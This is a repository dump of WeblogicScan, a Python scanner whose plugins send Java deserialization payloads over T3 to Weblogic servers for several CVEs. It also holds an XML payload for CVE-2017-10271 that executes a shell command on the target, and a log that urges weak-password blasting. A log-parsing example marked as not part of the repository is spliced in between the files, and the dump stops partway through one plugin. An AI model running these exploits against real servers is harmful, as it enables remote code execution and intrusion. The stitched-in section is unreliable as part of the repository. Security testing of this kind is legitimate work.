├── .DS_Store
├── README.md
├── Weblogic.log
├── WeblogicScan.py
├── app
    ├── __init__.py
    ├── __pycache__
    │   ├── __init__.cpython-36.pyc
    │   ├── __init__.cpython-37.pyc
    │   ├── main.cpython-36.pyc
    │   ├── main.cpython-37.pyc
    │   ├── platform.cpython-36.pyc
    │   └── platform.cpython-37.pyc
    ├── main.py
    ├── platform.py
    └── plugins
    │   ├── CVE-2014-4210.py
    │   ├── CVE-2016-0638.py
    │   ├── CVE-2016-3510.py
    │   ├── CVE-2017-10271.py
    │   ├── CVE-2017-3248.py
    │   ├── CVE-2017-3506.py
    │   ├── CVE-2018-2628.py
    │   ├── CVE-2018-2893.py
    │   ├── CVE-2018-2894.py
    │   ├── CVE-2019-2618.py
    │   ├── CVE-2019-2725.py
    │   ├── CVE-2019-2729.py
    │   ├── WeblogicConsole.py
    │   ├── __init__.py
    │   └── __pycache__
    │       ├── CVE-2014-4210.cpython-36.pyc
    │       ├── CVE-2016-0638.cpython-36.pyc
    │       ├── CVE-2016-3510.cpython-36.pyc
    │       ├── CVE-2017-10271.cpython-36.pyc
    │       ├── CVE-2017-3248.cpython-36.pyc
    │       ├── CVE-2017-3248.cpython-37.pyc
    │       ├── CVE-2017-3506.cpython-36.pyc
    │       ├── CVE-2018-2628.cpython-36.pyc
    │       ├── CVE-2018-2893.cpython-36.pyc
    │       ├── CVE-2018-2894.cpython-36.pyc
    │       ├── CVE-2018-2894.cpython-37.pyc
    │       ├── CVE-2019-2618.cpython-36.pyc
    │       ├── CVE-2019-2618.cpython-37.pyc
    │       ├── CVE-2019-2725.cpython-36.pyc
    │       ├── CVE-2019-2729.cpython-36.pyc
    │       ├── CVE-2019-2729.cpython-37.pyc
    │       ├── WeblogicConsole.cpython-36.pyc
    │       ├── WeblogicConsole.cpython-37.pyc
    │       ├── __init__.cpython-36.pyc
    │       ├── __init__.cpython-37.pyc
    │       ├── cve-2014-4210.cpython-37.pyc
    │       ├── cve-2016-0638.cpython-37.pyc
    │       ├── cve-2016-3510.cpython-37.pyc
    │       ├── cve-2017-10271.cpython-37.pyc
    │       ├── cve-2017-3428.cpython-37.pyc
    │       ├── cve-2017-3506.cpython-37.pyc
    │       ├── cve-2018-2628.cpython-37.pyc
    │       ├── cve-2018-2893.cpython-37.pyc
    │       ├── cve-2019-2725.cpython-37.pyc
    │       ├── plugin1.cpython-37.pyc
    │       └── plugin2.cpython-37.pyc
├── requirements.txt
└── weblogicscan.png


/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/.DS_Store
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # WeblogicScan
2 |
3 | An enhanced WeblogicScan, modified from rabbitmask's WeblogicScan V1.2. Original project before modification: https://github.com/rabbitmask/WeblogicScan
4 |
5 | ![weblogicscan](weblogicscan.png)
6 |
7 | # DEFF
8 |
9 | * Python 3 support
10 | * Fixed false positives in vulnerability detection, so results are more accurate
11 | * Added detection for CVE-2019-2729 and CVE-2019-2618
12 | * Plugin-based vulnerability scanning components
13 | * Added colored output
14 |
15 | # INSTALL
16 |
17 | ```
18 | pip3 install -r requirements.txt
19 | ```
20 |
21 | # Usage
22 |
23 | ```
24 | python3 WeblogicScan.py 192.168.1.1 7001
25 | ```
26 |
27 | # Supported CVEs
28 |
29 | * CVE-2014-4210
30 |
31 | * CVE-2016-0638
32 |
33 | * CVE-2016-3510
34 |
35 | * CVE-2017-3428
36 |
37 | * CVE-2017-3506
38 |
39 | * CVE-2017-10271
40 |
41 | * CVE-2018-2628
42 |
43 | * CVE-2018-2893
44 |
45 | * CVE-2018-2894
46 |
47 | * CVE-2019-2618
48 |
49 | * CVE-2019-2725
50 |
51 | * CVE-2019-2729
52 |
53 |
54 |
55 | # EXTENDS
56 |
57 | To add another CVE or another Weblogic vulnerability, write a plugin that follows the pattern below:
58 |
59 | ```python
60 | #!/usr/bin/env python
61 | # _*_ coding:utf-8 _*_
62 |
63 | import logging
64 | import sys
65 | import requests
66 |
67 | from ..platform import ManageProcessor,Color
68 |
69 | logging.basicConfig(filename='Weblogic.log',
70 |                     format='%(asctime)s %(message)s',
71 |                     filemode="w", level=logging.INFO)
72 |
73 | headers = {'user-agent': 'ceshi/0.0.1'}
74 |
75 |
76 | @ManageProcessor.plugin_register('CVE201XXXXX')
77 | class CVE201XXXXX(object):
78 |     def process(self,ip,port):
79 |         self.run(ip,port)
80 |
81 |     def run(self,url,port):
82 |         ......
83 |         your POC payload ......
84 |         if (success):
85 |             print(Color.OKGREEN+'[+]CVE201XXXXX 漏洞存在'+Color.ENDC)
86 | ```
87 |
88 |
89 |
90 | Then add the plugin's file name to `app/plugins/__init__.py`.
91 |
92 | `__init__.py`
93 |
94 | ```
95 | #!/usr/bin/env python
96 | # _*_ coding:utf-8 _*_
97 |
98 | __all__ = ['WeblogicConsole', 'CVE-2019-2618','CVE-2014-4210','CVE-2019-2725','CVE-2019-2729','CVE-2017-10271','CVE-2017-3506','CVE-2018-2894','CVE-2018-2628','CVE-2018-2893','CVE-2016-0638','CVE-2016-3510','CVE-2017-3248','CVE-201X-XXXX']
99 | ```
100 |
101 |
102 |
103 | # Thanks
104 |
105 | Thanks to Daybreak for the CVE-2019-2618 detection script.
106 |
107 | # UPDATES
108 |
109 | Fixed some problems in the POCs; please git clone the new code. The script was modified in a hurry, so if you find bugs, open an issue and they will be fixed step by step.
110 |
111 | # NOTES
112 |
113 | Detection of CVE-2019-2729 is not yet supported on the JDK 1.7 builds of Weblogic 10.3.6, Weblogic 12.1.3.0.0 and Weblogic 12.2.1.3.0.
--------------------------------------------------------------------------------
/Weblogic.log:
--------------------------------------------------------------------------------
1 | 2019-06-24 11:33:49,382 [+]The target Weblogic console address is exposed! The path is: http://192.168.43.36:7001/console/login/LoginForm.jsp Please try weak password blasting!
2 | 2019-06-24 11:33:49,396 [+]The target Weblogic UDDI module is exposed! The path is: http://192.168.43.36:7001/uddiexplorer/ Please verify the SSRF vulnerability!
3 | 2019-06-24 11:33:52,431 [+]The target weblogic has a JAVA deserialization vulnerability:CVE-2019-2725
4 | 2019-06-24 11:33:56,520 [+]The target weblogic has a JAVA deserialization vulnerability:CVE-2019-2729
5 | 2019-06-24 11:33:56,607 [+]The target weblogic has a JAVA deserialization vulnerability:CVE-2017-10271
6 | 2019-06-24 11:33:56,630 [+]The target weblogic has a JAVA deserialization vulnerability:CVE-2017-3506
7 | 2019-06-24 11:33:56,780 [-]Target weblogic not detected CVE-2018-2894
8 | 2019-06-24 11:34:17,003 [+]The target weblogic has a JAVA deserialization vulnerability:CVE-2018-2628
9 |
--------------------------------------------------------------------------------
/WeblogicScan.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 |
4 | import sys
5 |
6 | from app.main import pentest
7 | from app.platform import Color
8 |
9 | version = "1.3.1"
10 | banner='''
11 | __ __ _ _ _ ____
12 | \ \ / /__| |__ | | ___ __ _(_) ___ / ___| ___ __ _ _ __
13 | \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \
14 | \ V V / __/ |_) | | (_) | (_| | | (__ ___) | (_| (_| | | | |
15 | \_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_|
16 | |___/
17 | From WeblogicScan V1.2 Fixed by Ra1ndr0op: drops.org.cn | V {}
18 | '''.format(version)
19 | print(Color.OKYELLOW+banner+Color.ENDC)
20 | print('Welcome To WeblogicScan !!')
21 | if len(sys.argv)<3:
22 |     print('Usage: python3 WeblogicScan [IP] [PORT]')
23 | else:
24 |     ip = sys.argv[1]
25 |     port = int(sys.argv[2])
26 |     pentest(ip,port)
27 |
28 |
--------------------------------------------------------------------------------
/app/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 |
4 | from .plugins import *
--------------------------------------------------------------------------------
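Added example (not part of the WeblogicScan repository): a parser for the `Weblogic.log` format shown above that sorts every check into flagged, not detected, or no result. The check names come from the `app/plugins/` listing, and matching the console and UDDI lines by keyword is an assumption; a check with no log line is reported separately because `ManageProcessor.process()` in `app/platform.py` prints plugin exceptions to the console without logging them.

```python
import re
from typing import Dict, List, NamedTuple, Optional

# Check names taken from the app/plugins/ listing in this dump.
EXPECTED_CHECKS = (
    "WeblogicConsole", "CVE-2014-4210", "CVE-2016-0638", "CVE-2016-3510",
    "CVE-2017-3248", "CVE-2017-3506", "CVE-2017-10271", "CVE-2018-2628",
    "CVE-2018-2893", "CVE-2018-2894", "CVE-2019-2618", "CVE-2019-2725",
    "CVE-2019-2729",
)

# The eight lines of the Weblogic.log file shown in this dump.
SAMPLE_LOG = """\
2019-06-24 11:33:49,382 [+]The target Weblogic console address is exposed! The path is: http://192.168.43.36:7001/console/login/LoginForm.jsp Please try weak password blasting!
2019-06-24 11:33:49,396 [+]The target Weblogic UDDI module is exposed! The path is: http://192.168.43.36:7001/uddiexplorer/ Please verify the SSRF vulnerability!
2019-06-24 11:33:52,431 [+]The target weblogic has a JAVA deserialization vulnerability:CVE-2019-2725
2019-06-24 11:33:56,520 [+]The target weblogic has a JAVA deserialization vulnerability:CVE-2019-2729
2019-06-24 11:33:56,607 [+]The target weblogic has a JAVA deserialization vulnerability:CVE-2017-10271
2019-06-24 11:33:56,630 [+]The target weblogic has a JAVA deserialization vulnerability:CVE-2017-3506
2019-06-24 11:33:56,780 [-]Target weblogic not detected CVE-2018-2894
2019-06-24 11:34:17,003 [+]The target weblogic has a JAVA deserialization vulnerability:CVE-2018-2628
"""

# Matches the '%(asctime)s %(message)s' format the plugins pass to logging.
LINE_RE = re.compile(
    r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3}) \[([+-])\]\s*(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


class Finding(NamedTuple):
    status: str               # "flagged", "not_detected" or "no_result"
    timestamp: Optional[str]  # asctime of the log line, None if absent
    detail: str               # log message without the [+]/[-] marker


def check_name(message: str) -> Optional[str]:
    """Map a log message to the check that wrote it."""
    match = CVE_RE.search(message)
    if match:
        return match.group(0)
    lowered = message.lower()
    # Assumption: console and UDDI messages carry no CVE id, so they are
    # recognised by keyword. CVE-2014-4210.py is the UDDI/SSRF plugin.
    if "console" in lowered:
        return "WeblogicConsole"
    if "uddi" in lowered:
        return "CVE-2014-4210"
    return None


def triage(log_text: str, expected=EXPECTED_CHECKS) -> Dict[str, Finding]:
    """Return one Finding per check, including checks that left no line."""
    findings = {
        name: Finding("no_result", None,
                      "no log entry; the check raised or never ran")
        for name in expected
    }
    for raw in log_text.splitlines():
        match = LINE_RE.match(raw.strip())
        if not match:
            continue  # banner text, blank or truncated lines
        timestamp, sign, message = match.groups()
        name = check_name(message)
        if name is None:
            continue
        status = "flagged" if sign == "+" else "not_detected"
        previous = findings.get(name)
        # A positive result is never downgraded by a later negative line.
        if previous and previous.status == "flagged" and status != "flagged":
            continue
        findings[name] = Finding(status, timestamp, message)
    return findings


def by_status(findings: Dict[str, Finding], status: str) -> List[str]:
    """Sorted names of the checks that ended in the given status."""
    return sorted(n for n, f in findings.items() if f.status == status)


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for status in ("flagged", "not_detected", "no_result"):
        print(status, by_status(result, status))
```

A `not_detected` entry is not proof of absence: the README's NOTES section lists Weblogic builds on which CVE-2019-2729 detection is unsupported.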
/app/__pycache__/__init__.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/__pycache__/__init__.cpython-36.pyc
--------------------------------------------------------------------------------
/app/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/__pycache__/__init__.cpython-37.pyc
--------------------------------------------------------------------------------
/app/__pycache__/main.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/__pycache__/main.cpython-36.pyc
--------------------------------------------------------------------------------
/app/__pycache__/main.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/__pycache__/main.cpython-37.pyc
--------------------------------------------------------------------------------
/app/__pycache__/platform.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/__pycache__/platform.cpython-36.pyc
--------------------------------------------------------------------------------
/app/__pycache__/platform.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/app/__pycache__/platform.cpython-37.pyc
--------------------------------------------------------------------------------
/app/main.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 |
4 |
5 | from .platform import ManageProcessor
6 |
7 | def pentest(ip,port):
8 |     processor = ManageProcessor()
9 |     #print(processor.PLUGINS) # {’plugin1': }
10 |     processed = processor.process(ip,port)
11 |     #processed = processor.process(text="**foo bar**", plugins=('plugin2',))
12 |
--------------------------------------------------------------------------------
/app/platform.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 |
4 | class ManageProcessor(object):
5 |     PLUGINS = {}
6 |
7 |     def process(self,ip,port,plugins=()):
8 |         if plugins == ():
9 |             for plugin_name in self.PLUGINS.keys():
10 |                 try:
11 |                     print(Color.OKYELLOW+"[*]开始检测",plugin_name+Color.ENDC)
12 |                     self.PLUGINS[plugin_name]().process(ip,port)
13 |                 except Exception:
14 |                     print (Color.WARNING+"[-]{} 未成功检测,请检查网络连接或或目标存在负载中间件".format(plugin_name)+Color.ENDC)
15 |         else:
16 |             for plugin_name in plugins:
17 |                 try:
18 |                     print("[*]开始检测 ",self.PLUGINS[plugin_name])
19 |                     self.PLUGINS[plugin_name]().process(ip,port)
20 |                 except Exception:
21 |                     print ("[-]{}未成功检测,请检查网络连接或或目标存在负载中间".format(self.PLUGINS[plugin_name]))
22 |         return
23 |
24 |     @classmethod
25 |     def plugin_register(cls, plugin_name):
26 |         def wrapper(plugin):
27 |             cls.PLUGINS.update({plugin_name:plugin})
28 |             return plugin
29 |         return wrapper
30 |
31 | class Color:
32 |     HEADER = '\033[95m'
33 |     OKBLUE = '\033[90m'
34 |     OKGREEN = '\033[92m'
35 |     OKYELLOW = '\33[93m'
36 |     WARNING = '\033[91m'
37 |     FAIL = '\033[91m'
38 |     ENDC = '\033[0m'
39 |
40 |
41 |
42 |
--------------------------------------------------------------------------------
/app/plugins/CVE-2014-4210.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # _*_ coding:utf-8 _*_
3 |
4 |
5 | import logging
6 | import sys
7 | import requests
8 |
9 | from ..platform import ManageProcessor,Color
10 |
11 | logging.basicConfig(filename='Weblogic.log',
12 |                     format='%(asctime)s %(message)s',
13 |                     filemode="w", level=logging.INFO)
14 |
15 | headers = {'user-agent': 'ceshi/0.0.1'}
16 |
17 |
18 | @ManageProcessor.plugin_register('SSRF')
19 | class SSRF(object):
20 |     def process(self,ip,port):
21 |         self.run(ip,port)
22 |
23 |     def islive(self,ur,port):
24 |         url='http://' + str(ur)+':'+str(port)+'/uddiexplorer/'
25 |         r = requests.get(url, headers=headers)
26 |         return r.status_code
27 |
28 |     def run(self,url,port):
29 |         if self.islive(url,port)==200:
30 |             u='http://' + str(url)+':'+str(port)+'/uddiexplorer/'
31 |             logging.info('[+]The target Weblogic UDDI module is exposed! The path is: {} Please verify the SSRF vulnerability!'.format(u))
32 |             print(Color.OKBLUE+'[+]The target Weblogic UDDI module is exposed!\n[+]The path is: {}\n[+]Please verify the SSRF vulnerability!'.format(u)+Color.ENDC)
33 |             print(Color.OKGREEN+'[+]SSRF 漏洞存在'+Color.ENDC)
34 |         else:
35 |             logging.info("[-]The target Weblogic UDDI module default path does not exist!")
36 |             print(Color.FAIL+"[-]The target Weblogic UDDI module default path does not exist!"+Color.ENDC)
--------------------------------------------------------------------------------
/app/plugins/CVE-2016-0638.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # _*_ coding:utf-8 _*_
3 |
4 | import logging
5 | import socket
6 | import sys
7 | import time
8 | import re
9 |
10 | from ..platform import ManageProcessor,Color
11 |
12 |
13 | VUL='CVE-2016-0638'
14 | 
PAYLOAD=['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','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','aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078'] 15 | VER_SIG=['weblogic.jms.common.StreamMessageImpl'] 16 | 17 | 18 | logging.basicConfig(filename='Weblogic.log', 19 | format='%(asctime)s %(message)s', 20 | filemode="w", level=logging.INFO) 21 | 22 | 23 | @ManageProcessor.plugin_register('CVE20160638') 24 | class CVE20160638(object): 25 | def process(self,ip,port): 26 | self.run(ip,port,0) 27 | 28 | def t3handshake(self,sock,server_addr): 29 | sock.connect(server_addr) 30 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 31 | time.sleep(1) 32 | sock.recv(1024) 33 | 34 | def buildT3RequestObject(self,sock,port): 35 | data1 = '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' 36 | data2 = 
'007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port)) 37 | data3 = '1a7727000d3234322e323134' 38 | data4 = '2e312e32353461863d1d0000000078' 39 | for d in [data1,data2,data3,data4]: 40 | sock.send(bytes.fromhex(d)) 41 | time.sleep(2) 42 | 43 | def sendEvilObjData(self,sock,data): 44 | payload='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' 45 | payload+=data 46 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 47 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload) 48 | sock.send(bytes.fromhex(payload)) 49 | res = '' 50 | try: 51 | while True: 52 | res += sock.recv(4096).decode('utf-8','ignore') 53 | time.sleep(0.1) 54 | except Exception: 55 | pass 56 | return res 57 | def checkVul(self,res,index): 58 | 
p=re.findall(VER_SIG[index], res, re.S) 59 | if len(p)>0: 60 | logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL)) 61 | print(Color.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL)+Color.ENDC) 62 | print(Color.OKGREEN+'[+]CVE-2016-0638漏洞存在'+Color.ENDC) 63 | else: 64 | logging.info('[-]Target weblogic not detected {}'.format(VUL)) 65 | print (Color.FAIL+'[-]Target weblogic not detected {}'.format(VUL)+Color.ENDC) 66 | 67 | def run(self,ip,port,index): 68 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 69 | sock.settimeout(5) 70 | server_addr = (ip, port) 71 | self.t3handshake(sock,server_addr) 72 | self.buildT3RequestObject(sock,port) 73 | rs=self.sendEvilObjData(sock,PAYLOAD[index]) 74 | self.checkVul(rs,index) 75 | 76 | 77 | -------------------------------------------------------------------------------- /app/plugins/CVE-2016-3510.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import logging 5 | import socket 6 | import sys 7 | import time 8 | import re 9 | 10 | from ..platform import ManageProcessor,Color 11 | 12 | VUL=['CVE-2016-3510'] 13 | PAYLOAD=['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','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','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'] 14 | VER_SIG=['org.apache.commons.collections.functors.InvokerTransformer'] 15 | 16 | logging.basicConfig(filename='Weblogic.log', 17 | format='%(asctime)s %(message)s', 18 | filemode="w", level=logging.INFO) 19 | 20 | 21 | @ManageProcessor.plugin_register('CVE20163510') 22 | class CVE20163510(object): 23 | def process(self,ip,port): 24 | self.run(ip,port,0) 25 | 26 | def t3handshake(self,sock,server_addr): 27 | sock.connect(server_addr) 28 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 29 | time.sleep(1) 
30 | sock.recv(1024) 31 | def buildT3RequestObject(self,sock,port): 32 | data1 = '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' 33 | data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port)) 34 | data3 = '1a7727000d3234322e323134' 35 | data4 = '2e312e32353461863d1d0000000078' 36 | for d in [data1,data2,data3,data4]: 37 | sock.send(bytes.fromhex(d)) 38 | time.sleep(2) 39 | 40 | def sendEvilObjData(self,sock,data): 41 | payload='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' 42 | payload+=data 43 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 44 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload) 45 | sock.send(bytes.fromhex(payload)) 46 | res = '' 47 | try: 48 | while True: 49 | res += sock.recv(4096).decode('utf-8','ignore') 50 | time.sleep(0.1) 51 | except Exception: 52 | pass 53 | return res 54 | def checkVul(self,res,index): 55 | p=re.findall(VER_SIG[index], res, re.S) 56 | if len(p)>0: 57 | logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])) 58 | print(Color.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])+Color.ENDC) 59 | print(Color.OKGREEN+'[+]CVE-2016-3510 漏洞存在'+Color.ENDC) 60 | else: 61 | logging.info('[-]Target weblogic not detected {}'.format(VUL[index])) 62 | print(Color.FAIL+'[-]Target weblogic not detected 
{}'.format(VUL[index])+Color.ENDC) 63 | 64 | def run(self,ip,port,index): 65 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 66 | sock.settimeout(5) 67 | server_addr = (ip, port) 68 | self.t3handshake(sock,server_addr) 69 | self.buildT3RequestObject(sock,port) 70 | rs=self.sendEvilObjData(sock,PAYLOAD[index]) 71 | self.checkVul(rs,index) 72 | -------------------------------------------------------------------------------- /app/plugins/CVE-2017-10271.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import requests 5 | import re 6 | import logging 7 | 8 | 9 | from ..platform import ManageProcessor,Color 10 | 11 | logging.basicConfig(filename='Weblogic.log', 12 | format='%(asctime)s %(message)s', 13 | filemode="w", level=logging.INFO) 14 | 15 | VUL='CVE-2017-10271' 16 | index=1 17 | headers = {'user-agent': 'ceshi/0.0.1','content-type': 'text/xml',} 18 | poc_str = ''' 19 | 20 | 21 | 22 | 23 | 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 24 | 25 | 26 | 27 | com.supeream.exploits.XmlExp 28 | 29 | 30 | 31 | echo UjFhbmRyMG9wCg== | base64 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | ''' 54 | 55 | 56 | @ManageProcessor.plugin_register('CVE201710271') 57 | class CVE201710271(object): 58 | def process(self,ip,port): 59 | self.run(ip,port) 60 | 61 | def poc(self,url): 62 | if not url.startswith("http"): 63 | url = "http://" + url 64 | if "/" in url: 65 | url += '/wls-wsat/CoordinatorPortType' 66 | try: 67 | res = requests.post(url, data=poc_str, verify=False, timeout=5, headers=headers) 68 | response = res.text 69 | #response = re.search(r"\.*\<\/faultstring\>", response).group(0) 70 | except Exception: 71 | response = "" 72 | 73 | #if 'java.lang.ProcessBuilder' in response or "0" in response: 74 | if 'VWpGaGJtUnlNRzl3Q2c9PQo=' in response: 75 | logging.info('[+]The target weblogic has a JAVA 
deserialization vulnerability:{}'.format(VUL)) 76 | print(Color.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL)+Color.ENDC) 77 | print(Color.OKGREEN+'[+]CVE-2017-10271 漏洞存在'+Color.ENDC) 78 | else: 79 | logging.info('[-]Target weblogic not detected {}'.format(VUL)) 80 | print(Color.FAIL+'[-]Target weblogic not detected {}'.format(VUL)+Color.ENDC) 81 | def run(self,ip,port): 82 | url=ip+':'+str(port) 83 | self.poc(url=url) 84 | 85 | 86 | 87 | 88 | -------------------------------------------------------------------------------- /app/plugins/CVE-2017-3248.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import logging 5 | import socket 6 | import sys 7 | import time 8 | import re 9 | 10 | from ..platform import ManageProcessor,Color 11 | 12 | 13 | logging.basicConfig(filename='Weblogic.log', 14 | format='%(asctime)s %(message)s', 15 | filemode="w", level=logging.INFO) 16 | 17 | VUL=['CVE-2017-3248'] 18 | PAYLOAD=['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','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','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'] 19 | VER_SIG=['\\$Proxy[0-9]+'] 20 | 21 | @ManageProcessor.plugin_register('CVE20173248') 22 | class CVE20173248(object): 23 | def process(self,ip,port): 24 | self.run(ip,port,0) 25 | 26 | def t3handshake(self,sock,server_addr): 27 | sock.connect(server_addr) 28 | sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')) 29 | time.sleep(1) 30 | sock.recv(1024) 31 | 32 | def buildT3RequestObject(self,sock,port): 33 | data1 = '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' 34 | data2 = 
'007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port)) 35 | data3 = '1a7727000d3234322e323134' 36 | data4 = '2e312e32353461863d1d0000000078' 37 | for d in [data1,data2,data3,data4]: 38 | sock.send(bytes.fromhex(d)) 39 | time.sleep(2) 40 | 41 | def sendEvilObjData(self,sock,data): 42 | payload='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' 43 | payload+=data 44 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 45 | payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload) 46 | sock.send(bytes.fromhex(payload)) 47 | res = '' 48 | try: 49 | while True: 50 | res += sock.recv(4096).decode('utf-8','ignore') 51 | time.sleep(0.1) 52 | except Exception: 53 | pass 54 | return res 55 | def checkVul(self,res,index): 56 | 
